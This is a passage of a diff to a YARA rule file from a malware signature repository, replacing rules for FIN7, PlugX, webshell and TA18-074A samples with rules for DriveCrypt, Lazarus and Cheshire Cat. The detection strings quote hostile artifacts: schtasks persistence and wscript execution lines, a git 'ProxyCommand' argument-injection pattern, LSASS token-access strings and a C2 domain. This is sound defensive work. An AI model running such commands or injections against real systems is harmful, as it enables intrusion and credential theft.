 		quality = 85
 		tags = ""
 
 	strings:
-		$s1 = "no_root_squash_exports" fullword ascii
-		$s2 = "nfs lock manager" fullword ascii
-		$s3 = "netapp partner" fullword ascii
-		$s4 = "xdrdef.mnt3_type" fullword ascii
-		$s5 = "BTRFS subvolumes" fullword ascii
-		$s6 = "Unsupported fsid" fullword ascii
-		$s7 = "nfs3_read_etc_shadow" fullword ascii
-		$s8 = "nfs3_check_no_root_squash" fullword ascii
-		$s9 = "krb5i" fullword ascii
-		$s10 = "nfs4_overview" fullword ascii
-		$s11 = "--btrfs-subvolumes" fullword ascii
-		$s12 = "when escaping a BTRFS export" fullword ascii
-		$s13 = "No NFS server detected" fullword ascii
+		$ = "Z_PostBackJS" ascii wide
+		$ = "z_file_download" ascii wide
+		$ = "z_WebShell" ascii wide
+		$ = "1367948c7859d6533226042549228228" ascii wide
 
 	condition:
-		6 of them
+		3 of them
 }
-rule SIGNATURE_BASE_FIN7_Dropper_Aug17 : FILE
+rule SIGNATURE_BASE_EXP_Drivecrypt_1 : FILE
 {
 	meta:
-		description = "Detects Word Dropper from Proofpoint FIN7 Report"
+		description = "Detects DriveCrypt exploit"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4929dff6-9f33-5d22-b560-c2195440a1cc"
-		date = "2017-08-04"
+		id = "c192ca53-1de3-5d2d-a216-47e534ff4d01"
+		date = "2018-08-21"
 		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7_backdoor.yar#L12-L32"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vul_drivecrypt.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "610b7288e08d36858de88abac3a86dcb6ebba1c019e17fb716f5c26aa964903b"
+		logic_hash = "1959f2e4838e40f2abc26ee16b03089088c96cafb101125bdc346f69fe76d7a4"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c91642c0a5a8781fff9fd400bff85b6715c96d8e17e2d2390c1771c683c7ead9"
-		hash2 = "cf86c7a92451dca1ebb76ebd3e469f3fa0d9b376487ee6d07ae57ab1b65a86f8"
+		hash1 = "0dd09bc97c768abb84d0fb6d1ae7d789f1f83bfb2ce93ff9ff3c538dc1effa33"
 
 	strings:
-		$x1 = "tpircsj:e/ b// exe.tpircsw\" rt/" fullword ascii
-		$s1 = "Scripting.FileSystemObject$" fullword ascii
-		$s2 = "PROJECT.THISDOCUMENT.AUTOOPEN" fullword wide
-		$s3 = "Project.ThisDocument.AutoOpen" fullword wide
-		$s4 = "\\system3" ascii
-		$s5 = "ShellV" fullword ascii
+		$s1 = "x64passldr.exe" fullword ascii
+		$s2 = "DCR.sys" fullword ascii
+		$s3 = "amd64\\x64pass.sys" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0xcfd0 and filesize < 700KB and 1 of ( $x* ) or all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and 2 of them
 }
-rule SIGNATURE_BASE_FIN7_Backdoor_Aug17 : FILE
+rule SIGNATURE_BASE_EXP_Drivecrypt_X64Passldr : FILE
 {
 	meta:
-		description = "Detects Word Dropper from Proofpoint FIN7 Report"
+		description = "Detects DriveCrypt exploit"
 		author = "Florian Roth (Nextron Systems)"
-		id = "906daf88-520b-57b5-825e-29f060b43183"
-		date = "2017-08-04"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7_backdoor.yar#L34-L74"
+		id = "94594b4e-091d-5964-b2b4-5d7d44601b28"
+		date = "2018-08-21"
+		modified = "2023-01-06"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vul_drivecrypt.yar#L19-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "76818317c543c1464898463741ddaf8c6368d0f5004c088a323c4323db49060c"
+		logic_hash = "573cd96f7f82788a3884cd4b4d91c739a890835c3ed1b3933af48ba5756cc5a6"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		hash1 = "c828304c83619e2cb9dab80305e5286aba91742dc550e1469d91812af27101a1"
 
 	strings:
-		$x1 = "wscript.exe //b /e:jscript C:\\Users\\" ascii
-		$x2 = "wscript.exe /b /e:jscript C:\\Users\\" ascii
-		$x3 = "schtasks /Create /f /tn \"GoogleUpdateTaskMachineSystem\" /tr \"wscript.exe" ascii nocase
-		$x4 = "schtasks /Delete /F /TN \"\"GoogleUpdateTaskMachineCore" ascii nocase
-		$x5 = "schtasks /Delete /F /TN \"GoogleUpdateTaskMachineCore" ascii nocase
-		$x6 = "wscript.exe //b /e:jscript %TMP%\\debug.txt" ascii
-		$s1 = "/?page=wait" fullword ascii
-		$a1 = "autoit3.exe" fullword ascii
-		$a2 = "dumpcap.exe" fullword ascii
-		$a3 = "tshark.exe" fullword ascii
-		$a4 = "prl_cc.exe" fullword ascii
-		$v1 = "vmware" fullword ascii
-		$v2 = "PCI\\\\VEN_80EE&DEV_CAFE" fullword ascii
-		$v3 = "VMWVMCIHOSTDEV" fullword ascii
-		$c1 = "apowershell" fullword ascii
-		$c2 = "wpowershell" fullword ascii
-		$c3 = "get_passwords" fullword ascii
-		$c4 = "kill_process" fullword ascii
-		$c5 = "get_screen" fullword ascii
+		$s1 = "\\x64\\x64passldr.pdb" ascii
+		$s2 = "\\amd64\\x64pass.sys" wide
+		$s3 = "\\\\.\\DCR" fullword ascii
+		$s4 = "Open SC Mgr Error" fullword ascii
+		$s5 = "thing is ok " fullword ascii
+		$s6 = "x64pass" fullword wide
+		$s7 = "%ws\\%ws\\Security" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and ( 1 of ( $x* ) or all of ( $a* ) or all of ( $v* ) or 3 of ( $c* ) ) ) or 5 of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 3 of them
 }
-rule SIGNATURE_BASE_Aptgroupx_Plugxtrojanloader_Stringdecode
+rule SIGNATURE_BASE_Win32_Buzus_Softpulse : FILE
 {
 	meta:
-		description = "Rule to detect PlugX Malware"
-		author = "Jay DiMartino"
-		id = "c6017327-b44d-5b1d-95aa-6e1f9fbf5583"
-		date = "2016-08-17"
+		description = "Trojan Buzus / Softpulse"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3b555916-030a-5773-b2f1-e995fc81b697"
+		date = "2015-05-13"
 		modified = "2023-12-05"
-		reference = "https://t.co/4xQ8G2mNap"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_plugx.yar#L2-L36"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_buzus_softpulse.yar#L2-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e5ab15b035bb0169864e687e5c26732dd5b8f5f184473a33e685f53699ce4acc"
-		score = 80
+		hash = "2f6df200e63a86768471399a74180466d2e99ea9"
+		logic_hash = "49625594db57e9d629860970c20493b76e554addc2edb41adba64673a820a94b"
+		score = 75
 		quality = 85
-		tags = ""
-		hash1 = "0535e8c300204e257f0fa57630f386e9fcc8e779"
-		hash2 = "088ebf9ccde958f32d11f4e7eb14f5332332f97d"
-		hash3 = "0c999d0bffa007e9e6b6fe593933b52f40c75b3d"
-		hash4 = "2f644e7131ec0a4f12ce04ba1e54d23856dbbfbf"
-		hash5 = "3be9148ad132ca342d5fbabea1119a175ef1df7c"
-		hash6 = "4c1ee94ec0e15491fc4f6b4095f67eee6309e62a"
-		hash7 = "587af7ce05e61d4c312d6bae12ea380116b08d7e"
-		hash8 = "5990efd83b5646a7ba419541d3a2c19260224ca3"
-		hash9 = "67970367c250c44a5feb263843cf45fd91336df5"
-		hash10 = "68f53f7188910a4cf67843aedd38c1523f1f2e7c"
-		hash11 = "962dc7e0ad37286df012f623423ac4182fe791ca"
-		hash12 = "aa0976906807af2e1b127608040aa3ef6e118a13"
-		hash13 = "b170d015e32b39fa4ac15f94d58e45e65cd16d6c"
-		hash14 = "c9b3d2cef3b34c7ee18fc2f60ff022965959613d"
-		hash15 = "cd425ce7f3e4a823d9027780e1b439759c4dc665"
-		hash16 = "d5e82513c6472d3826a22d9a15c05af8c0d33b58"
-		hash17 = "d9b32084f27ef13001060e1dcee8a1a9e95d89a6"
-		hash18 = "daa2d1cb9148b7ba5a86fa9ab593678e77c92672"
-		hash19 = "e2c098a95d1c1f0e29f207af9c5ffc5bd69a92ee"
-		hash20 = "ef8cf68dc3c80e9cb5a3fa0f92b544eab583812e"
-		hash21 = "f0fc0a4e4e0748464caa6a202d0083cd33458677"
-		hash22 = "fe1abe55529c1d6aa6b2a2f02d7e41ea58040feb"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$byte1 = { 8A [2-4] 8A [2-4] FF 05 00 30 00 10 [0-5] 2A [1-6] 80 [2-7] 02 [1-6] 88 0? }
-		$byte2 = { 8B [2-4] 8A [2-4] FF 05 00 30 00 10 [0-5] 2A [1-6] 80 [2-7] 02 [1-6] 88 0? }
+		$x1 = "pi4izd6vp0.com" fullword ascii
+		$s1 = "SELECT * FROM Win32_Process" fullword wide
+		$s4 = "CurrentVersion\\Uninstall\\avast" fullword wide
+		$s5 = "Find_RepeatProcess" fullword ascii
+		$s6 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\" wide
+		$s7 = "myapp.exe" fullword ascii
+		$s14 = "/c ping -n 1 www.google" wide
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and ( ( $x1 and 2 of ( $s* ) ) or all of ( $s* ) )
 }
-rule SIGNATURE_BASE_Powershell_Suite_Hacktools_Gen_Strings : FILE
+rule SIGNATURE_BASE_SUSP_RAR_Ntdsdit : FILE
 {
 	meta:
-		description = "Detects strings from scripts in the PowerShell-Suite repo"
+		description = "Detects suspicious RAR file that contains ntds.dit or SAM export"
 		author = "Florian Roth (Nextron Systems)"
-		id = "afccdd99-da83-5fde-9e21-52220ded1e47"
-		date = "2017-12-27"
+		id = "da9e160f-3213-5027-bb0f-bf80ab3d5318"
+		date = "2019-12-16"
+		modified = "2022-11-15"
+		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rar_exfil.yar#L2-L18"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "12e527b040e02f573f2a6e0fac4ff99ec441bf189c9bb7e1f763619c079a5bfa"
+		score = 70
+		quality = 85
+		tags = "FILE"
+
+	strings:
+		$x1 = "ntds.dit0" ascii fullword
+		$x2 = { 0? 53 41 4D 30 01 00 03 }
+		$x3 = { 0? 73 61 6D 30 01 00 03 }
+
+	condition:
+		uint32( 0 ) == 0x21726152 and 1 of them
+}
+rule SIGNATURE_BASE_APT_Lazarus_Aug18_Downloader_1 : FILE
+{
+	meta:
+		description = "Detects Lazarus Group Malware Downloadery"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f536db7b-b645-522f-b750-6431878d2e31"
+		date = "2018-08-24"
 		modified = "2023-12-05"
-		reference = "https://github.com/FuzzySecurity/PowerShell-Suite"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_suite.yar#L2-L46"
+		reference = "https://securelist.com/operation-applejeus/87553/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_applejeus.yar#L13-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0f14a0665c60e85c0cf508f46130b09e467a16270fcd1aa8d0319e17778d4d75"
+		logic_hash = "f6bdaa8aa76da3e679094ae9759a67b5db33d0445f7204ff13e400fa6db60386"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "79071ba5a984ee05903d566130467483c197cbc2537f25c1e3d7ae4772211fe0"
-		hash2 = "db31367410d0a9ffc9ed37f423a4b082639591be7f46aca91f5be261b23212d5"
-		hash3 = "4f51e7676a4d54c1962760ca0ac81beb28008451511af96652c31f4f40e8eb8e"
-		hash4 = "17ac9bb0c46838c65303f42a4a346fcba838ebd5833b875e81dd65c82701d8a8"
-		hash5 = "fa33aef619e620a88ecccb990e71c1e11ce2445f799979d23be2d1ad4321b6c6"
-		hash6 = "5542bd89005819bc4eef8dfc8a158183e5fd7a1438c84da35102588f5813a225"
-		hash7 = "c6a99faeba098eb411f0a9fcb772abac2af438fc155131ebfc93a00e3dcfad50"
-		hash8 = "a8e06ecf5a8c25619ce85f8a23f2416832cabb5592547609cfea8bd7fcfcc93d"
-		hash9 = "6aa5abf58904d347d441ac8852bd64b2bad3b5b03b518bdd06510931a6564d08"
-		hash10 = "5608f25930f99d78804be8c9c39bd33f4f8d14360dd1e4cc88139aa34c27376d"
-		hash11 = "68b6c0b5479ecede3050a2f44f8bb8783a22beeef4a258c4ff00974f5909b714"
-		hash12 = "da25010a22460bbaabff0f7004204aae7d830348e8a4543177b1f3383b2c3100"
+		hash1 = "d555dcb6da4a6b87e256ef75c0150780b8a343c4a1e09935b0647f01d974d94d"
+		hash2 = "bdff852398f174e9eef1db1c2d3fefdda25fe0ea90a40a2e06e51b5c0ebd69eb"
+		hash3 = "e2199fc4e4b31f7e4c61f6d9038577633ed6ad787718ed7c39b36f316f38befd"
 
 	strings:
-		$ = "[!] NtCreateThreadEx failed.." fullword ascii
-		$ = "[?] Executing mmc.." ascii
-		$ = "[!] This method is only supported on 64-bit!" fullword ascii
-		$ = "$LNK = [ShellLink.Shortcut]::FromByteArray($LNKHeader.GetBytes())" fullword ascii
-		$ = "$CallResult = [UACTokenMagic]::TerminateProcess($ShellExecuteInfo.hProcess, 1)" fullword ascii
-		$ = "[!] Unable to open process (as Administrator), this may require SYSTEM access." fullword ascii
-		$ = "[!] Error, NTSTATUS Value: " ascii
-		$ = "[!] UAC artifact: " ascii
-		$ = "[>] Process dump success!" ascii
-		$ = "[!] Process dump failed!" ascii
-		$ = "[+] Eidolon entry point:" fullword ascii
-		$ = "Wait for shellcode to run" fullword ascii
-		$ = "$Command = Read-Host \"`nSMB shell\"" fullword ascii
-		$ = "Use Netapi32::NetSessionEnum to enumerate active sessions on domain joined machines." fullword ascii
-		$ = "Invoke-CreateProcess -Binary C:\\Windows\\System32\\" ascii
-		$ = "[?] Thread belongs to: " ascii
-		$ = "[?] Operating system core count: " ascii
-		$ = "[>] Calling Advapi32::LookupPrivilegeValue --> SeDebugPrivilege" fullword ascii
-		$ = "Calling Advapi32::OpenProcessToken --> LSASS" ascii
-		$ = "[!] Mmm, something went wrong! GetLastError returned:" ascii
-		$ = "if (($FileBytes[0..1] | % {[Char]$_}) -join '' -cne 'MZ')" fullword ascii
+		$x1 = "H:\\DEV\\TManager\\" ascii
+		$x2 = "\\Release\\dloader.pdb" ascii
+		$x3 = "Z:\\jeus\\"
+		$x4 = "\\Debug\\dloader.pdb" ascii
+		$x5 = "Moz&Wie;#t/6T!2yW29ab@ad%Df324V$Yd" fullword ascii
+		$s1 = "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" fullword ascii
+		$s2 = "Error protecting memory page" fullword ascii
 
 	condition:
-		filesize < 100KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( ( 1 of ( $x* ) or 2 of them ) )
 }
-rule SIGNATURE_BASE_Powershell_Suite_Eidolon : FILE
+
+rule SIGNATURE_BASE_APT_Lazarus_Aug18_1 : FILE
 {
 	meta:
-		description = "Detects PowerShell Suite Eidolon script - file Start-Eidolon.ps1"
+		description = "Detects Lazarus Group Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5440d8fc-b939-556f-a8a0-ef5feb29e32f"
-		date = "2017-12-27"
+		id = "fda4970a-2787-5e9c-9944-a6222145f4a7"
+		date = "2018-08-24"
 		modified = "2023-12-05"
-		reference = "https://github.com/FuzzySecurity/PowerShell-Suite"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_suite.yar#L48-L63"
+		reference = "https://securelist.com/operation-applejeus/87553/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_applejeus.yar#L39-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "587a9a8569801e2aa96a6f171705fdc1db5632734b54e5a9eb8282502e1efc63"
+		logic_hash = "efd43e2d84ba964e7fc7e6c03eaba3dd5181c9cbe51b4a06a7a723dca95fab17"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "db31367410d0a9ffc9ed37f423a4b082639591be7f46aca91f5be261b23212d5"
+		hash1 = "ef400d73c6920ac811af401259e376458b498eb0084631386136747dfc3dcfa8"
+		hash2 = "1b8d3e69fc214cb7a08bef3c00124717f4b4d7fd6be65f2829e9fd337fc7c03c"
 
 	strings:
-		$ = "[+] Eidolon entry point:" ascii
-		$ = "C:\\PS> Start-Eidolon -Target C:\\Some\\File.Path -Mimikatz -Verbose" fullword ascii
-		$ = "[Int16]$PEArch = '0x{0}' -f ((($PayloadBytes[($OptOffset+1)..($OptOffset)]) | % {$_.ToString('X2')}) -join '')" fullword ascii
+		$s1 = "mws2_32.dll" fullword wide
+		$s2 = "%s.bat" fullword wide
+		$s3 = "%s%s%s \"%s > %s 2>&1\"" fullword wide
+		$s4 = "Microsoft Corporation. All rights reserved." fullword wide
+		$s5 = "ping 127.0.0.1 -n 3" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x7566 and filesize < 13000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "3af996e4f960108533e69b9033503f40" or 4 of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_Z_Webshell_2 : FILE
+rule SIGNATURE_BASE_APT_Lazarus_Aug18_2 : FILE
 {
 	meta:
-		description = "Detection for the z_webshell"
-		author = "DHS NCCIC Hunt and Incident Response Team"
-		id = "9a54925f-de10-567f-a1ea-5e7522b47dfd"
-		date = "2018-01-25"
+		description = "Detects Lazarus Group Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3c77d603-6443-5e78-8a8a-a89112619aa6"
+		date = "2018-08-24"
 		modified = "2023-12-05"
-		old_rule_name = "z_webshell"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta18_074A.yar#L9-L24"
+		reference = "https://securelist.com/operation-applejeus/87553/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_applejeus.yar#L62-L82"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2c9095c965a55efc46e16b86f9b7d6c6"
-		logic_hash = "d41aa107e54af5d45531a46d24b24f9f14635dbcb50ed26f7c787883854f961f"
+		logic_hash = "75d52ad829383392d9eb20a8308278d073d16f7624e60010356534bdc6acc81f"
 		score = 75
-		quality = 81
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8ae766795cda6336fd5cad9e89199ea2a1939a35e03eb0e54c503b1029d870c4"
+		hash2 = "d3ef262bae0beb5d35841d131b3f89a9b71a941a86dab1913bda72b935744d2e"
 
 	strings:
-		$webshell_name = "public string z_progname =" nocase ascii wide
-		$webshell_password = "public string Password =" nocase ascii wide
+		$s1 = "vAdvapi32.dll" fullword wide
+		$s2 = "lws2_32.dll" fullword wide
+		$s3 = "%s %s > \"%s\" 2>&1" fullword wide
+		$s4 = "Not Service" fullword wide
+		$s5 = "ping 127.0.0.1 -n 3" fullword wide
 
 	condition:
-		( uint32( 0 ) == 0x2040253c or uint32( 0 ) == 0x7073613c ) and filesize < 100KB and 2 of ( $webshell_* )
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 4 of them )
 }
-rule SIGNATURE_BASE_TA18_074A_Screen : FILE
+rule SIGNATURE_BASE_APT_Fallchill_RC4_Keys : FILE
 {
 	meta:
-		description = "Detects malware mentioned in TA18-074A"
+		description = "Detects FallChill RC4 keys"
 		author = "Florian Roth (Nextron Systems)"
-		id = "789ee5e5-83c3-5137-a078-ff230dbf8fcd"
-		date = "2018-03-16"
+		id = "ead7d84c-91aa-58b0-af3b-1211b0bde864"
+		date = "2018-08-21"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA18-074A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta18_074A.yar#L34-L51"
+		reference = "https://securelist.com/operation-applejeus/87553/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_applejeus.yar#L84-L100"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e96f70e3d9c7ff5812724111788365c47e2b478a35b39771c12a3d3636a6a020"
+		logic_hash = "59861618dba256996d7bbcd94a6efccdb64589fc75086bfe7d980fa51761ef97"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2f159b71183a69928ba8f26b76772ec504aefeac71021b012bd006162e133731"
 
 	strings:
-		$s1 = "screen.exe" fullword wide
-		$s2 = "PlatformInvokeUSER32" fullword ascii
-		$s3 = "GetDesktopImageF" fullword ascii
-		$s4 = "PlatformInvokeGDI32" fullword ascii
-		$s5 = "Too many arguments, going to store in current dir" fullword wide
+		$cod0 = { c7 ?? ?? da e1 61 ff
+                c7 ?? ?? 0c 27 95 87
+                c7 ?? ?? 17 57 a4 d6
+                c7 ?? ?? ea e3 82 2b }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 60KB and 3 of them
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule SIGNATURE_BASE_TA18_074A_Scripts : FILE
+rule SIGNATURE_BASE_Cheshirecat_Sample2 : FILE
 {
 	meta:
-		description = "Detects malware mentioned in TA18-074A"
+		description = "Auto-generated rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4c786098-c5f4-529b-8732-03183dfa94b5"
-		date = "2018-03-16"
-		modified = "2022-08-18"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA18-074A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta18_074A.yar#L53-L67"
+		id = "14448138-0af3-5669-8aa3-f9e773e2a008"
+		date = "2015-08-08"
+		modified = "2023-12-05"
+		reference = "https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cheshirecat.yar#L11-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "888ddd59b388033604474fc008f830159a9a104683fb052e7497b83118cbb8aa"
-		score = 75
+		hash = "dc18850d065ff6a8364421a9c8f9dd5fcce6c7567f4881466cee00e5cd0c7aa8"
+		logic_hash = "4dd299cfe36545dba5ccac22d2eedc405f548fe5f976514d1cfa8238b472782c"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2f159b71183a69928ba8f26b76772ec504aefeac71021b012bd006162e133731"
 
 	strings:
-		$s1 = "Running -s cmd /c query user on " ascii
+		$s0 = "mpgvwr32.dll" fullword ascii
+		$s1 = "Unexpected failure of wait! (%d)" fullword ascii
+		$s2 = "\"%s\" /e%d /p%s" fullword ascii
+		$s4 = "error in params!" fullword ascii
+		$s5 = "sscanf" fullword ascii
+		$s6 = "<>Param : 0x%x" fullword ascii
 
 	condition:
-		filesize < 600KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 4 of ( $s* )
 }
-rule SIGNATURE_BASE_Git_CVE_2017_9800_Poc : CVE_2017_9800 FILE
+rule SIGNATURE_BASE_Cheshirecat_Gen1 : FILE
 {
 	meta:
-		description = "Detects a CVE-2017-9800 exploitation attempt"
+		description = "Auto-generated rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1692eec4-a9af-5d00-97b8-badbe0ba0711"
-		date = "2017-08-11"
+		id = "2068feed-2101-5b12-9e36-db7b0f5cc4ec"
+		date = "2015-08-08"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/mzbat/status/895811803325898753"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2017_9800.yar#L2-L17"
+		reference = "https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cheshirecat.yar#L35-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1cfd0c5cb255d3ca63917c41c092df70d68b04f5d210a66abd5e35e509ff4beb"
-		score = 60
+		logic_hash = "d1bbda9340bc2d2fcefd6bf9a3c30fe0b99c66fb978b3a4583f17c521cfcf4b0"
+		score = 90
 		quality = 85
-		tags = "CVE-2017-9800, FILE"
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "ec41b029c3ff4147b6a5252cb8b659f851f4538d4af0a574f7e16bc1cd14a300"
+		hash2 = "32159d2a16397823bc882ddd3cd77ecdbabe0fde934e62f297b8ff4d7b89832a"
+		hash3 = "63735d555f219765d486b3d253e39bd316bbcb1c0ec595ea45ddf6e419bef3cb"
+		hash4 = "c074aeef97ce81e8c68b7376b124546cabf40e2cd3aff1719d9daa6c3f780532"
 
 	strings:
-		$s1 = "git clone ssh://-oProxyCommand=" ascii
-		$s2 = "git clone http://-" ascii
-		$s3 = "git clone https://-" ascii
+		$x1 = "CAPESPN.DLL" fullword wide
+		$x2 = "WINF.DLL" fullword wide
+		$x3 = "NCFG.DLL" fullword wide
+		$x4 = "msgrthlp.dll" fullword wide
+		$x5 = "Local\\{c0d9770c-9841-430d-b6e3-575dac8a8ebf}" fullword ascii
+		$x6 = "Local\\{1ef9f94a-5664-48a6-b6e8-c3748db459b4}" fullword ascii
+		$a1 = "Interface\\%s\\info" fullword ascii
+		$a2 = "Interface\\%s\\info\\%s" fullword ascii
+		$a3 = "CLSID\\%s\\info\\%s" fullword ascii
+		$a4 = "CLSID\\%s\\info" fullword ascii
+		$b1 = "Windows Shell Icon Handler" fullword wide
+		$b2 = "Microsoft Shell Icon Handler" fullword wide
+		$s1 = "\\StringFileInfo\\%s\\FileVersion" ascii
+		$s2 = "CLSID\\%s\\AuxCLSID" fullword ascii
+		$s3 = "lnkfile\\shellex\\IconHandler" fullword ascii
+		$s4 = "%s: %s, %.2hu %s %hu %2.2hu:%2.2hu:%2.2hu GMT" fullword ascii
+		$s5 = "%sMutex" fullword ascii
+		$s6 = "\\ShellIconCache" ascii
+		$s7 = "+6Service Pack " fullword ascii
 
 	condition:
-		filesize < 200KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 350KB and 7 of ( $s* ) and 2 of ( $a* ) and 1 of ( $b* ) and 1 of ( $x* )
 }
-rule SIGNATURE_BASE_APT6_Malware_Sample_Gen : FILE
+rule SIGNATURE_BASE_Cheshirecat_Gen2 : FILE
 {
 	meta:
-		description = "Rule written for 2 malware samples that communicated to APT6 C2 servers"
+		description = "Cheshire Cat Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "142d2714-f7bf-5725-bf7e-9497be7ed234"
-		date = "2016-04-09"
-		modified = "2023-01-06"
-		reference = "https://otx.alienvault.com/pulse/56c4d1664637f26ad04e5b73/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt6_malware.yar#L8-L55"
